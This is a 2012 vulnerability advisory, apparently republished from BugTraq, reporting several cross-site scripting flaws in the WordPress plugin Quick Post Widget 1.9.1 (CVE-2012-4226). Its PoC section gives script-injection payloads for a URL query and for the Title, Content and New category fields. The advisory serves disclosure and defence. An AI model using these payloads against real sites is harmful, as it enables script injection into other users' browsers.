WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities

2012-09-03T00:00:00
ID SECURITYVULNS:DOC:28509
Type securityvulns
Reporter Securityvulns
Modified 2012-09-03T00:00:00

Description

Advisory: WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-016 Author: Stefan Schurtz Affected Software: Successfully tested on Quick Post Widget 1.9.1 Vendor URL: http://qpw.famvanakkeren.nl/ Vendor Status: informed CVE-ID: CVE-2012-4226

========================== Vulnerability Description ==========================

The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities

================== PoC-Exploit ==================

// GET http://[target]/wordpress/?"></script><script>alert(/xss/)</script>

// POST http://[target]/wordpress/ -> Quickpost 'Title' -> "></script><script>alert(/xss/)</script> http://[target]/wordpress/ -> Quickpost 'Content' -> "></script><script>alert(/xss/)</script> http://[target]/wordpress/ -> Quickpost 'New category' -> "></script><script>alert(/xss/)</script>

========= Solution =========

-

==================== Disclosure Timeline ====================

02-Jul-2012 - developer informed 09-Jul-2012 - developer feedback 10-Aug-2012 - post on BugTraq

======== Credits ========

Vulnerabilities found and advisory written by Stefan Schurtz.

=========== References ===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-016.txt